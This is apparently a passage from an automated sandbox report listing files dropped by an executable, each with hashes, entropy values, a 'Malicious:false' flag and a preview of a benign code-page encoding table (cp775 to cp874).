                                                                                                                                                                                                                              SSDEEP:24:CsOHVBUlJvRj7SOVbusZhAMiZyi77qoo9ecL067J4ZNUPVw3PfA:AMlBVnrAMiwMm59T067KDLPo
                                                                                                                                                                                                                              MD5:9656761FA02EA24773EAD3E5C4BDB975
                                                                                                                                                                                                                              SHA1:366228F25392708FA799E9CC0830CE9917EF6CA7
                                                                                                                                                                                                                              SHA-256:C3C6542E902DEC2C44DDCFD8B5CB7ABF309B0413A7CED1614DC0B20CF7C5E35F
                                                                                                                                                                                                                              SHA-512:A6A44B9A2193D75764DC284BE53264E57BFEB2A221FD54B4577DD90752F69A45E6B9D293108A7AB895F347A24FD10AAE84954A043AB1F466F485D707D7412380
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp775, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..010600FC00E9010100E4012300E501070142011301560157012B017900C400C5..00C900E600C6014D00F6012200A2015A015B00D600DC00F800A300D800D700A4..0100012A00F3017B017C017A201D00A600A900AE00AC00BD00BC014100AB00BB..259125922593250225240104010C01180116256325512557255D012E01602510..25142534252C251C2500253C0172016A255A25542569256625602550256C017D..0105010D01190117012F01610173016B017E2518250C25882584258C25902580..00D300DF014C014300F500
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.3718781469586827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:C9HVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBc+myS5LeQDTVwA:EMlBVnrAMiwMm+VeyS5SQn/
                                                                                                                                                                                                                              MD5:2169EE726DCC011E6C3505D586C88FC3
                                                                                                                                                                                                                              SHA1:094252AD0634787E2D7F0D28A448437054D359C7
                                                                                                                                                                                                                              SHA-256:13DF611F429A9B331DA1B34F3C718CCCAF0BD4AB44F71A9C632197987B4D643B
                                                                                                                                                                                                                              SHA-512:BC5831EF1C131095A22C76FFCB5C4217081AF796B60455BE2DE2E2689CFE1033F07E8B45449F77E7804A7D52CBCFB916B0B4639828E65B14475BB3367F47C8EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp850, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D800D70192..00E100ED00F300FA00F100D100AA00BA00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00F000D000CA00CB00C8013100CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.4509005787389877
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CPHVBUlJvRj7SOVbusZhAMiZyi77q7EUsOtycwQIc+922V:mMlBVnrAMiwMmwvOtycwQIc+9R
                                                                                                                                                                                                                              MD5:48402B424B5101BDEEB0192BBA96DB7D
                                                                                                                                                                                                                              SHA1:C9EB93A37AF70F4134AA9CF05D914A30FB3201DD
                                                                                                                                                                                                                              SHA-256:F3A18A8C7934F6586F023477E08D3F9D5EAD9A45E9E58A3F8D018AF9BB13F868
                                                                                                                                                                                                                              SHA-512:4EE615605BFF3D94A7FC4FE23D8288F0F20F6792C8C69ECACABAE82F1A334D8417C5DFFC0DA3702E2DB09B7BE1E5FF19C6A0F460C9A5EC84D1856BB9C8061CA5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp852, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E4016F010700E7014200EB0150015100EE017900C40106..00C90139013A00F400F6013D013E015A015B00D600DC01640165014100D7010D..00E100ED00F300FA01040105017D017E0118011900AC017A010C015F00AB00BB..2591259225932502252400C100C2011A015E256325512557255D017B017C2510..25142534252C251C2500253C01020103255A25542569256625602550256C00A4..01110110010E00CB010F014700CD00CE011B2518250C258825840162016E2580..00D300DF00D40143014401
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.4277025591531864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CoHVBUlJvRj7SOVbusZhAMiZyi77qLHVWjwk/rMZC032SLnD2JbD:hMlBVnrAMiwMmx8whM03VLDy
                                                                                                                                                                                                                              MD5:8B8AA56F83BA750EB73FAE542E76FF1A
                                                                                                                                                                                                                              SHA1:2F3C3BA4B854A7D6B0A3D27BC519EE66A042E05A
                                                                                                                                                                                                                              SHA-256:E64FD2E639DA6F654D9BFBB2266F9432259A6A55941622F5CDDC3797E382EB0A
                                                                                                                                                                                                                              SHA-512:8B4061176663F7AC01B3969D25F680B5870A8EAD864CFAD897F18E75409CE721E6CC367A88EBABAF72E77D4542EE1894F2A6EE47A43FB3D4C650CFA18DFD3D71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp855, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0452040204530403045104010454040404550405045604060457040704580408..04590409045A040A045B040B045C040C045E040E045F040F044E042E044A042A..0430041004310411044604260434041404350415044404240433041300AB00BB..259125922593250225240445042504380418256325512557255D043904192510..25142534252C251C2500253C043A041A255A25542569256625602550256C00A4..043B041B043C041C043D041D043E041E043F2518250C25882584041F044F2580..042F044004200441042104
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.364496856690505
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CaHVBUlJvRj7SOVbusZhAMiZyi77qZpu6uUV5Dw5LeBCVHjzA:jMlBVnrAMiwMmyUVFw5SYdI
                                                                                                                                                                                                                              MD5:BA52A031DE1B1A6ED1C41BED8946750C
                                                                                                                                                                                                                              SHA1:BD54C0E2F62FD36675892A61FD8B340A56845D20
                                                                                                                                                                                                                              SHA-256:B6CD5C6F2B54D89142679D599ED0A5DEE6955A3B3F6B6673E46AFE7A5A303CDC
                                                                                                                                                                                                                              SHA-512:5F915AABE39F31CE9337B4B9B0239DF8ADA898D2D9F111DD09D97689DB89CF45B093AC187FC28484CFB213D14B0D8F58C5668D0A59726282D6F52D5D24697816
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp857, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE013100C400C5..00C900E600C600F400F600F200FB00F9013000D600DC00F800A300D8015E015F..00E100ED00F300FA00F100D1011E011F00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00BA00AA00CA00CB00C8000000CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.506813480871637
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CMHVBUlJvRj7SOVbusZhAMiZyi77qij4Axlt49Y18wDyV8mK:VMlBVnrAMiwMm/g+9Y1LmK
                                                                                                                                                                                                                              MD5:C416471B57FB894DC45D30C31B4BD2E2
                                                                                                                                                                                                                              SHA1:BA378F8122280992AE51245A06814D8155564220
                                                                                                                                                                                                                              SHA-256:804EFA345C5BBBAD2449C318A7A3F5B31F4234712AAD23DC49B3FB5AA33B7A57
                                                                                                                                                                                                                              SHA-512:E7CDE706CFE573525C2DE319AD5783AE9D97C4F6D28B14A77A729F281540B0DAFAD4C14879EF76473BFDEBC38499C65CA228470983F2D1BC31938A91A2486522
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp860, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E300E000C100E700EA00CA00E800CD00D400EC00C300C2..00C900C000C800F400F500F200DA00F900CC00D500DC00A200A300D920A700D3..00E100ED00F300FA00F100D100AA00BA00BF00D200AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5174672833207183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ClHVBUlJvRj7SOVbusZhAMiZyi77qZpORVPnA2Gm18wDyV8mK:8MlBVnrAMiwMmiVPAA1LmK
                                                                                                                                                                                                                              MD5:4997979FD1692063E2B9AA9870E0BE4C
                                                                                                                                                                                                                              SHA1:919012354B99BBEF4C85517E89A2C9CD340FCE49
                                                                                                                                                                                                                              SHA-256:4B7E76AEB75289FACA76434EA6E9874E9504AD2BC3D8D47550EADBCC8294857E
                                                                                                                                                                                                                              SHA-512:C122A1AE2DE79CB97E5989535B7478A76D905CDE60B01F80F5B84EDB9DF08BE6829E1811AF19608971DA048B8DA24F40DE0217A8054AC612EC2D8B3560500FBE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp861, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800D000F000DE00C400C5..00C900E600C600F400F600FE00FB00DD00FD00D600DC00F800A300D820A70192..00E100ED00F300FA00C100CD00D300DA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5573268031592717
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CdMHVBUlJvRj7SOVbusZhAMiZyi77q36AqE18wDyV8mK:iMMlBVnrAMiwMmq3E1LmK
                                                                                                                                                                                                                              MD5:9B4D1B95B20BD67555517DCC3007B22A
                                                                                                                                                                                                                              SHA1:2C0D6121DB49CDAB6FBAA81398BE2E44BE4E1110
                                                                                                                                                                                                                              SHA-256:6C15CB256B1C22170292589C6F589E64E164EB36EC7E84F0BD48149BABB7C5FC
                                                                                                                                                                                                                              SHA-512:34C3E401364D579E8AC7A4E1F1F7A29A84C62E1D5146D7664832639EA3997227DC4BAF1B64DC605E6574D680E61B55D0C69C329E35B1BEC41501FC68C5B634B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp862, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..05D005D105D205D305D405D505D605D705D805D905DA05DB05DC05DD05DE05DF..05E005E105E205E305E405E505E605E705E805E905EA00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.518080906819747
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CXHVBUlJvRj7SOVbusZhAMiZyi77qwGuXVFq5EC18wDyV8mK:eMlBVnrAMiwMmw3VFu1LmK
                                                                                                                                                                                                                              MD5:C93CCDF65F7F349F22855745660F02AE
                                                                                                                                                                                                                              SHA1:604888B1FB3C57DF47277CDD1153597BA89E8C36
                                                                                                                                                                                                                              SHA-256:232D6FE34D7151920232EAAE9C515F36400AB64136DCC5B802D6245AC6F5D56B
                                                                                                                                                                                                                              SHA-512:D5B65AE7353F694A37AF29177BF1A95477918FC5A002C2FE199624BD5B391698807BAECF54225BC40F62B3CA7912C7066A4AAF01B9E3E399133831CAA342BF4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp863, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200C200E000B600E700EA00EB00E800EF00EE201700C000A7..00C900C800CA00F400CB00CF00FB00F900A400D400DC00A200A300D900DB0192..00A600B400F300FA00A800B800B300AF00CE231000AC00BD00BC00BE00AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.72017408907567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CwHVBUlJvRj7YOVbusZhAMiZyi77qcHj92OibcDQAyUjSG:5MlrVnrAMiwMmSsNcDQvcSG
                                                                                                                                                                                                                              MD5:146E0D1779D50E070E0EF875E8374DF8
                                                                                                                                                                                                                              SHA1:B51E5598712598BC387DD79AE80BD879F139140D
                                                                                                                                                                                                                              SHA-256:81BEBFD9A61E9F17495763B68D57742FAB2A1A43871015699A2C8E5FDED4EC19
                                                                                                                                                                                                                              SHA-512:1F0DAD8E77712C5A018894332BE72FF5C546C92F481421CCB8553AD6F1E9A18617765C8CEE4187265CCCB1AB073E221289D34C9AB1F0501231D52C81FC1C932B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp864, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00200021002200230024066A0026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00B000B72219221A259225002502253C2524252C251C25342510250C25142518..03B2221E03C600B100BD00BC224800AB00BBFEF7FEF8009B009CFEFBFEFC009F..00A000ADFE8200A300A4FE8400000000FE8EFE8FFE95FE99060CFE9DFEA1FEA5..0660066106620663066406650666066706680669FED1061BFEB1FEB5FEB9061F..00A2FE80FE81FE83FE85FECAFE8BFE8DFE91FE93FE97FE9BFE9FFEA3FEA7FEA9..FEABFEADFEAFFEB3FEB7FEBBFEBFFEC1FEC5FECBFECF00A600AC00F700D7FEC9..0640FED3FED7FEDBFEDFFE
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5193842128126676
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CsKHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBnAFj18wDyV8mK:gMlBVnrAMiwMm+VRAFj1LmK
                                                                                                                                                                                                                              MD5:150B2E00B3F84F8075F3653ED7A4C8E0
                                                                                                                                                                                                                              SHA1:7131DC656EFE1F2277B19DA72F0EEB46B4EC54A0
                                                                                                                                                                                                                              SHA-256:ADA1A52064EE93EBE6F8A5D101D01F8776038E12F21A5CA1C006EE833577C705
                                                                                                                                                                                                                              SHA-512:AC56EEB0220826BF8FF6CA52768DB63961AAC46095A2F3EEBA11B5973CC92AF52DFBBE9E85A0DD04CAB8998212FA2599EDD83BAAA7FB2D394E330FF2F7C015DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp865, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D820A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00A4..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5038992968715266
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CCHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9aRme3cB18wDyVNZkR:bMlBVnrAMiwMm8YnsB1wZy
                                                                                                                                                                                                                              MD5:FC33B5F773E87696A69E8798446E9772
                                                                                                                                                                                                                              SHA1:4FC5589C1DD88BB8171758BC173A63B3A5687AE5
                                                                                                                                                                                                                              SHA-256:32A45DEBA933C7ED99141535087A4C99BA79802175E3F762ACA6EB941157F85A
                                                                                                                                                                                                                              SHA-512:332D2FEC532192F58F792441E61D675A8692C36BECF768D07F64B8C31561CC1A2DF402625A4719E758A9B59DE4228FFE9F94F067E7DC0D82F9DA2D6500E50304
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp866, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..0440044104420443044404
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5261138894265507
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CtHVBUlJvRj7SOVbusZhAMiZyi77qii+lh2o5+hdVMQFhWgCDrKE:EMlBVnrAMiwMmXY2o5+hdVMQFhWf3f
                                                                                                                                                                                                                              MD5:4A2C66AA630D4AE2BF1E7546DCE2DAE5
                                                                                                                                                                                                                              SHA1:FABB672957D21CA2B4E0EACA5FCE6093BAACF77A
                                                                                                                                                                                                                              SHA-256:AFE6ED6EB5D07C45B6B928A48BC5EF57EFCF61602D36FF9FBDE4A8EA3FA6DF75
                                                                                                                                                                                                                              SHA-512:A548002EB7AF8735DBBBCC9883B44B326F261C02A3C7CE65C373755DD92212A66740112EAE0FC556CAD5B86911709C6DF12167DC5B6AD1E01C6F1EB5AB16DB37
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp869, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850386008700B700AC00A620182019038820150389..038A03AA038C00930094038E03AB00A9038F00B200B303AC00A303AD03AE03AF..03CA039003CC03CD039103920393039403950396039700BD0398039900AB00BB..25912592259325022524039A039B039C039D256325512557255D039E039F2510..25142534252C251C2500253C03A003A1255A25542569256625602550256C03A3..03A403A503A603A703A803A903B103B203B32518250C2588258403B403B52580..03B603B703B803B903BA03
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.33737382140564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CSyHVBUlJvRj7SOVbusZhAMiZyi77qVQEHmEU4AyqU+TWwdd:CMlBVnrAMiwMmWr4AyqUSd
                                                                                                                                                                                                                              MD5:FC8C876B4738236FC71A1AF96E4566D0
                                                                                                                                                                                                                              SHA1:DDFDC3F62D99A6BD705CF0719B50F66449C8808A
                                                                                                                                                                                                                              SHA-256:4F05F31CA026BBFEEEE49ED86504CB060784137A9CFAE0E5954D276E837AB5DE
                                                                                                                                                                                                                              SHA-512:5BF58A810E029840825FFF3318E90415E6F2B7E46032FD428B4971923D41A64C127A6F438E4894E80EC9604CD34F1D47B4F9A02ABAB3E7D6351611811DC1F2B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp874, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC008100820083008420260086008700880089008A008B008C008D008E008F..009020182019201C201D20222013201400980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E440E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49008
                                                                                                                                                                                                                              Entropy (8bit):3.5144574650895364
                                                                                                                                                                                                                              Encrypted:false
